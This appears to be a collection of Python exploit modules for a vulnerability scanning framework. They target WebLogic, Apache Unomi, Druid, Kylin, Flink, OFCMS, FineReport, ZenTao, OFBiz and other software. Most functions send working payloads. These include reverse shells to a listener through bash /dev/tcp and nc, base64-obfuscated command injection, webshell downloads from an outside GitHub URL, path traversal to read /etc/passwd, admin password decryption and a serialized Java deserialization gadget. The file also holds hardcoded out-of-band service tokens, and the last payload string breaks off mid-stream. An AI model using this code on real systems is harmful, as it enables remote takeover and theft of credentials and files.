def _verify(self): result = {} veri_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType') random_uri = random_str(16) check_host = 'zum76x.ceye.io' check_port = 80 payload = self.get_check_payload(check_host, check_port, random_uri) headers = { "Content-Type": "text/xml;charset=UTF-8", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)" } try: requests.post(veri_url, data=payload, headers=headers) resp = requests.get( 'http://api.ceye.io/v1/records?token=7404ec52d62f743915a2a3adc07a2077&type=request' ) pattern = 'http://{0}(:{1})?/{2}'.format(check_host, check_port, random_uri) if re.search(pattern, resp.text): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = veri_url result['VerifyInfo']['Payload'] = payload except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def _shell(self): result = {} #执行反弹shell的请求 pocurl = self.url + '/context.json' pocheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64', 'Content-Type': 'application/json;charset=UTF-8', 'Content-Length': '1003', 'Accept': 'application/json, text/plain, */*', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9' } IP = get_listener_ip() PORT = get_listener_port() # IP = yourlistenerip # PORT = yourlistenerport payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1' payload = 'bash -c {echo,' + (base64.b64encode( payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}' pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}' try: r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False) #执行ping指令 except Exception as e: logger.warn(str(e)) return self.parse_attack(result)
def _shell(self): result = {} #执行反弹shell的请求 pocurl = self.url + '/druid/indexer/v1/sampler?for=filter' pocheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64', 'Content-Type': 'application/json;charset=UTF-8', 'Content-Length': '1003', 'Accept': 'application/json, text/plain, */*', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9' } IP = yourlistenIP PORT = yourlistenPORT payload = 'nc ' + IP + ' ' + PORT + ' -e /bin/sh' pocjson = '{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\\"isRobot\\":true,\\"channel\\":\\"#x\\",\\"timestamp\\":\\"2021-2-1T14:12:24.050Z\\",\\"flags\\":\\"x\\",\\"isUnpatrolled\\":false,\\"page\\":\\"1\\",\\"diffUrl\\":\\"https://xxx.com\\",\\"added\\":1,\\"comment\\":\\"Botskapande Indonesien omdirigering\\",\\"commentLength\\":35,\\"isNew\\":true,\\"isMinor\\":false,\\"delta\\":31,\\"isAnonymous\\":true,\\"user\\":\\"Lsjbot\\",\\"deltaBucket\\":0,\\"deleted\\":0,\\"namespace\\":\\"Main\\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec(\'' + payload + '\')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}' try: r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False) #执行ping指令 except Exception as e: logger.warn(str(e)) return self.parse_attack(result)
def _verify(self): result = {} cookies = self.login() CEye_main = CEye(token=self.token) ceye_subdomain = CEye_main.getsubdomain() random_uri = random_str(16) logger.info("random_url为:%s" % random_uri) verify_payload = "curl%20" + random_uri + "." + str(ceye_subdomain) veri_url = urljoin( self.url, '/kylin/api/diag/project/%7c%7c' + verify_payload + '%7c%7c/download') headers = { "Content-Type": "text/xml;charset=UTF-8", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Cookie": cookies } logger.info("Headres如下:") logger.info(headers) try: resp = requests.get(veri_url, headers=headers) if CEye_main.verify_request(random_uri): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = veri_url result['VerifyInfo']['Payload'] = verify_payload except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def _shell(self): result = {} #执行反弹shell的请求 pocurl = self.url + '/context.json' pocheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64', 'Content-Type': 'application/json;charset=UTF-8', 'Content-Length': '1003', 'Accept': 'application/json, text/plain, */*', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9' } IP = get_listener_ip() PORT = get_listener_port() # IP = yourlistenerip # PORT = yourlistenerport payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1' payload = 'bash -c {echo,' + (base64.b64encode( payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}' pocjson = '{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"' + payload + '\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"6666"} ' try: r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False) #执行ping指令 except Exception as e: logger.warn(str(e)) return self.parse_attack(result)
def _attack(self): result = {} try: Flag_error = "This file does not exist in JobManager log dir" if self.get_option("filename"): attack_filename = self.get_option("filename").replace( '/', '\\\\') else: attack_filename = 'App\\Common\\Conf\\db.php' logger.info("下载文件为:" + attack_filename) attack_payload = '/xyhai.php?s=/Database/downFile/file/..\\..\\..\\' + attack_filename + '/type/zip' attack_url = self.url + attack_payload logger.info(attack_url) cookies = {'PHPSESSID': self.get_option("PHPSESSID")} attack_res = requests.get(attack_url, cookies=cookies, verify=False) if attack_res.status_code == 200 and Flag_error not in attack_res.content.decode( ): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = attack_url result['VerifyInfo']['Payload'] = attack_payload result['VerifyInfo'][ 'File_Content'] = '\n' + attack_res.content.decode() except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def login(self): login_url = urljoin(self.url, '/ofcms-admin/admin/dologin.json') post_data = { "username": self.get_option("username"), "password": self.get_option("password") } headers = { "Content-Type": "application/json; charset=UTF-8", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", } try: resp = requests.post(login_url, data=json.dumps(post_data)) if resp.status_code == 200 and json.loads( resp.text)['code'] == '200': cookies = requests.utils.dict_from_cookiejar(resp.cookies) cookie = "JSESSIONID=" + cookies["JSESSIONID"] logger.info("获得的Cookie为:%s" % cookie) logger.info("Ofcms系统登录成功") else: logger.info("Ofcms系统登录失败,报错为 %s " % str(resp.text)) except Exception as e: logger.warn(e) logger.warn("Ofcms系统登录失败") return cookie
def _verify(self): result = {} cookies = self.login() random_uri = random_str(16) logger.info("random_uri为:%s" % random_uri) verify_payload = "update of_cms_link set link_name=updatexml(1,concat(0x7e,('" + random_uri + "'),0x7e),0) where link_id=4" post_data = {"sql": verify_payload} veri_url = urljoin( self.url, '/ofcms-admin/admin/system/generate/create.json?sqlid=') headers = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Cookie": cookies } logger.info("Headres如下:") logger.info(headers) try: resp = requests.post(veri_url, data=post_data, headers=headers) flag = "~" + random_uri + "~" if flag in resp.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = veri_url result['VerifyInfo']['Payload'] = verify_payload except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def _verify(self): result = {} veri_url = urljoin(self.url, '/_async/AsyncResponseService') cmd = random_str(16) + '.6eb4yw.ceye.io' payload = self.get_check_payload(cmd) headers = { 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", 'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 'Accept-Language': "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", 'Accept-Encoding': "gzip, deflate", 'Cookie': "sidebar_collapsed=false", 'Connection': "close", 'Upgrade-Insecure-Requests': "1", 'Content-Type': "text/xml", 'Content-Length': "1001", 'cache-control': "no-cache" } try: requests.post(veri_url, data=payload, headers=headers) res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns') if cmd in res.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = veri_url result['VerifyInfo']['Payload'] = payload except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def _verify(self): result = {} veri_url = self.url + '/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml' try: resp = requests.get(veri_url) pattern1 = r"<rootManagerPassword>.*</rootManagerPassword>" patrern2 = r"<rootManagerName>.*</rootManagerName>" r2 = re.search(patrern2, str(resp.content)) r1 = re.search(pattern1, str(resp.content)) username = r2.group(0)[28:-21] cipher = r1.group(0)[32:-25] PASSWORD_MASK_ARRY = [19, 78, 10, 15, 100, 213, 43, 23] password = "" cipher = cipher[3:] for i in range(int(len(cipher) / 4)): p1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16) p2 = p1 ^ PASSWORD_MASK_ARRY[i % 8] password = password + chr(p2) if resp.status_code == 200 and password: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = veri_url result['AdminInfo'] = {} result['AdminInfo']["UserName"] = username result['AdminInfo']["Password"] = password except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def _shell(self): veri_url1 = urljoin( self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1') veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php') cmd = self.get_option("command") data = "';{};'".format(cmd) headers = {'cookie': 'isAdmin=1;username=admin'} try: requests.get(veri_url1) requests.post(veri_url2, data=data, headers=headers) except Exception as e: logger.warn(str(e))
def _shell(self): vul_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType') cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1'.format( get_listener_ip(), get_listener_port()) shell_payload = self.get_shell_payload('/bin/bash', '-c', cmd) headers = { "Content-Type": "text/xml;charset=UTF-8", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)" } try: requests.post(vul_url, data=shell_payload, headers=headers) except Exception as e: logger.warn(str(e))
def _verify(self): result = {} try: Flag_error = "This file does not exist in JobManager log dir" verify_payload = '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fhosts' verify_url = self.url + verify_payload logger.info(verify_url) verify_res = requests.get(verify_url,verify=False) if verify_res.status_code ==200 and Flag_error not in verify_res.content.decode(): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = verify_url result['VerifyInfo']['Payload'] = verify_payload result['VerifyInfo']['File_Content'] = '\n'+ verify_res.content.decode() except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def _verify(self): result = {} veri_url1 = urljoin( self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1') veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php') cmd = 'cat /proc/cpuinfo' data = "';{};'".format(cmd) headers = {'cookie': 'isAdmin=1;username=admin'} try: requests.get(veri_url1) resp = requests.post(veri_url2, data=data, headers=headers) if any(keyword in resp.text for keyword in ['Processor', 'BogoMIPS', 'Hardware', 'Revision']): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url except Exception as e: logger.warn(str(e)) return self.parse_verify(result)
def _verify(self): result = {} phpcode = "phpinfo()" flagText = "allow_url_include" verify_payload = "searchword=1&searchtype=5&order=}{end if}{if:1)" + phpcode + ";if(1}{end if}" veri_url = urljoin(self.url, '/search.php') headers = { "Content-Type": "application/x-www-form-urlencoded;charset=utf-8", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", } try: resp = requests.post(veri_url,data=verify_payload,headers=headers) if flagText in resp.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = veri_url result['VerifyInfo']['Payload'] = verify_payload except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def _shell(self): result = {} random_uri = random_str(16) try: shell_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_shell.php' base64_payload = base64.b64encode(shell_payload.encode()) shell_content = base64_payload.decode() shell_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + shell_content print(shell_url) cookies = { "zentaosid": self.get_option("zentaosid") } down_res = requests.get(shell_url,cookies=cookies) shell_info_url = self.url + '/data/client/'+random_uri+'/php_shell.php' logger.info("webshell地址:" + shell_info_url) shell_res = requests.get(shell_info_url,cookies=cookies) except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def _verify(self): result = {} try: Flag_error = "该文件不存在" verify_payload = '/xyhai.php?s=/Database/downFile/file/..\\..\\..\\xyhai.php/type/zip' verify_url = self.url + verify_payload logger.info(verify_url) cookies = {'PHPSESSID': self.get_option("PHPSESSID")} verify_res = requests.get(verify_url, cookies=cookies, verify=False) if verify_res.status_code == 200 and Flag_error not in verify_res.content.decode( ): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = verify_url result['VerifyInfo']['Payload'] = verify_payload result['VerifyInfo'][ 'File_Content'] = '\n' + verify_res.content.decode() except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def _attack(self): result = {} try: Flag_error = "This file does not exist in JobManager log dir" if self.get_option("filename"): attack_filename = quote(quote(self.get_option("filename"),'utf-8')) else: attack_filename = quote(quote("/etc/passwd",'utf-8')) logger.info("下载文件为:" + attack_filename) attack_payload = '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..' + attack_filename attack_url = self.url + attack_payload logger.info(attack_url) attack_res = requests.get(attack_url,verify=False) if attack_res.status_code ==200 and Flag_error not in attack_res.content.decode(): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = attack_url result['VerifyInfo']['Payload'] = attack_payload result['VerifyInfo']['File_Content'] = '\n' + attack_res.content.decode() except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def _verify(self): result = {} CEye_main = CEye(token=self.token) ceye_subdomain = CEye_main.getsubdomain() random_uri = random_str(16) logger.info("random_url为:%s" % random_uri) verify_payload = """<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY %% xxe SYSTEM "http://%s/%s"> %%xxe; ]>""" % (ceye_subdomain,random_uri) logger.warn(verify_payload) veri_url = self.url logger.warn(veri_url) headers = { "Content-Type": "text/xml", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "SOAPAction": "aaa" } try: resp = requests.post(veri_url,data=verify_payload,headers=headers) if CEye_main.verify_request(random_uri): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = veri_url result['VerifyInfo']['Payload'] = verify_payload except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def _attack(self): result = {} random_uri = random_str(16) try: attack_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_attack.php' base64_payload = base64.b64encode(attack_payload.encode()) attack_content = base64_payload.decode() attack_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + attack_content logger.info(attack_url) cookies = { "zentaosid": self.get_option("zentaosid") } down_res = requests.get(attack_url,cookies=cookies) attack_info_url = self.url + '/data/client/'+random_uri+'/php_attack.php' attack_res = requests.get(attack_info_url,cookies=cookies) if attack_res.status_code ==200 and "d4d7a6b8b3ed8ed86db2ef2cd728d8ec" in attack_res.content.decode() : result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = attack_info_url result['VerifyInfo']['Payload'] = attack_payload except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def _verify(self): result = {} random_uri = random_str(16) try: verify_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_verify.txt' base64_payload = base64.b64encode(verify_payload.encode()) verify_content = base64_payload.decode() verify_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + verify_content logger.info(verify_url) cookies = { "zentaosid": self.get_option("zentaosid") } down_res = requests.get(verify_url,cookies=cookies) verify_info_url = self.url + '/data/client/'+random_uri+'/php_verify.txt' verify_res = requests.get(verify_info_url,cookies=cookies) if verify_res.status_code ==200 and "md5('3.1416');" in verify_res.content.decode() : result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = verify_info_url result['VerifyInfo']['Payload'] = verify_payload except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def login(self): login_url = urljoin(self.url, '/kylin/api/user/authentication') login_data = b64encode((self.get_option("username") + ":" + self.get_option("password")).encode("utf-8")) headers = {"Authorization": "Basic %s" % login_data.decode('utf-8')} post_data = {} try: resp = requests.post(login_url, data=post_data, headers=headers) if resp.status_code == 401: logger.info("账号或密码错误") if resp.status_code == 200: cookies = requests.utils.dict_from_cookiejar(resp.cookies) cookie = "JSESSIONID=" + cookies["JSESSIONID"] logger.info("获得的Cookie为:%s" % cookie) logger.info("Apache_Kylin登录成功") else: logger.info("Apache_Kylin登录失败,响应状态码为 %s " % str(resp.status_code)) except Exception as e: logger.warn(str(e)) logger.warn("Apache_Kylin登录失败") return cookie
def _verify(self): result = {} getdnssub_url = 'http://www.dnslog.cn/getdomain.php' getres_url = 'http://www.dnslog.cn/getrecords.php' dnsheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64' } dnssess = requests.session() #获取dnslog的subdomain try: dnsreq = dnssess.get(url=getdnssub_url, headers=dnsheaders, allow_redirects=False, verify=False, timeout=10) except Exception as e: logger.warn(str(e)) #执行ping dnslog的请求 pocurl = self.url + '/context.json' pocheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36', 'Content-Type': 'application/json;charset=UTF-8', 'Content-Length': '1003', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9' } payload = 'ping catchyou.' + dnsreq.text payload = 'bash -c {echo,' + (base64.b64encode( payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}' pocjson = '{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"' + payload + '\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"6666"} ' # pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\"bash -c {echo,' + (base64.b64encode(payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}' try: r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False) #执行ping指令 time.sleep(5) except Exception as e: logger.warn(str(e)) #检查dnslog日志 try: dnsres = dnssess.get(url=getres_url, headers=dnsheaders, allow_redirects=False, verify=False, timeout=10) if dnsres.status_code == 200 and 'catchyou' in dnsres.text: result['VerifyInfo'] = {} # result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, pr.port) result['VerifyInfo']['URL'] = self.url result['extra'] = {} result['extra']['evidence'] = dnsres.text except Exception as e: logger.warn(str(e)) return self.parse_attack(result)
def _verify(self): result = {} getdnssub_url = 'http://www.dnslog.cn/getdomain.php' getres_url = 'http://www.dnslog.cn/getrecords.php' dnsheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64' } dnssess = requests.session() #获取dnslog的subdomain try: dnsreq = dnssess.get(url=getdnssub_url, headers=dnsheaders, allow_redirects=False, verify=False, timeout=10) except Exception as e: logger.warn(str(e)) #执行ping dnslog的请求 pocurl = self.url + '/context.json' pocheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36', 'Content-Type': 'application/json;charset=UTF-8', 'Content-Length': '1003', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9' } payload = 'ping catchyou.' + dnsreq.text payload = 'bash -c {echo,' + (base64.b64encode( payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}' pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}' # pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\"bash -c {echo,' + (base64.b64encode(payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}' try: r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False) #执行ping指令 time.sleep(5) except Exception as e: logger.warn(str(e)) #检查dnslog日志 try: dnsres = dnssess.get(url=getres_url, headers=dnsheaders, allow_redirects=False, verify=False, timeout=10) if dnsres.status_code == 200 and 'catchyou' in dnsres.text: result['VerifyInfo'] = {} # result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, pr.port) result['VerifyInfo']['URL'] = self.url result['extra'] = {} result['extra']['evidence'] = dnsres.text except Exception as e: logger.warn(str(e)) return self.parse_attack(result)
def _verify(self): result = {} mainurl = self.url + '/myportal/control/main' r1 = requests.get(url=mainurl, verify=False) print(r1.status_code, r1.text) pocurl = self.url + '/webtools/control/xmlrpc' headers = {'Content-Type': 'application/xml', 'Content-Length': '4127'} payload = 'rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAABu/K/rq+AAAAMgA5CgADACIHADcHACUHACYBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFrSCT85Hd7z4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAE1N0dWJUcmFuc2xldFBheWxvYWQBAAxJbm5lckNsYXNzZXMBADVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHACgBADN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAUamF2YS9pby9TZXJpYWxpemFibGUBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQBdYmFzaCAtYyB7ZWNobyxZbUZ6YUNBdGFTQStKaUF2WkdWMkwzUmpjQzh4T1RJdU1UWTRMalV5TGpFdk5qWTJOaUF3UGlZeH18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9CAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAceXNvc2VyaWFsL1B3bmVyMTE1NDY2NjE4MDA0MAEAHkx5c29zZXJpYWwvUHduZXIxMTU0NjY2MTgwMDQwOwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACXVxAH4AEAAAAdTK/rq+AAAAMgAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSg